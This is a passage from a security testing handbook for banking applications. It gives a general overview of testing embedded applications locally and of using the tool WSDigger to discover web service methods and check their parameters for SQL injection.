Embedded application – Security Testing Handbook for Banking Applications

3: The Tools of the Trade
Embedded application
An embedded application is an application where the
software is built into the hardware. It might be the case that
we don’t have an interface to access the device remotely,
which means that we need to be physically present in front
of the device to test it. The chances of us being able to
upload tools onto the machine are very slim. Hence the
approach that we take to test such applications are different.
We look at the operating system the application is running
on and perform a local assessment with and without logins.
When we have a login into the machine we check the
configuration settings on the machine for the OS that’s
running. We then check the source code for any code which
has not been written securely and report it.
Web services application
A web service is very similar to a normal application. It
doesn’t have its own user interface, but provides an
application programming interface that exposes methods
for the requester to invoke.
All the published methods in a web service are exposed to
everyone. Though a user may be expected to invoke only
two or three exposed methods, they will be able to discover
other methods that are available. If those methods are not
adequately protected, then the user will be able to invoke
them too. A tool called WSDigger can assist us a lot here to
study the methods available. The exact structure of the call
is revealed in a document called a WSDL document. The
WSDL is the document which exposes all the methods –
3: The Tools of the Trade
WSDigger helps to identify these methods. Here’s a
screenshot of WSDigger. Once you click Get Methods a list
of methods and all its parameters with any default values
that the parameters might have is displayed.
Figure 36: WSDigger
It’s also possible to test for SQL injection for its parameters
through WSDigger. Select the parameter that you want to
test for SQL injection, then go to Attacks – Select Attack
Types and select what attacks you want to perform. It’s
possible to add to this list or select only specific attacks.
The application exposes certain methods which are relevant
to its functionality to the public. However there might still
be methods which aren’t exposed to everyone. While
testing we make an attempt to discover these methods.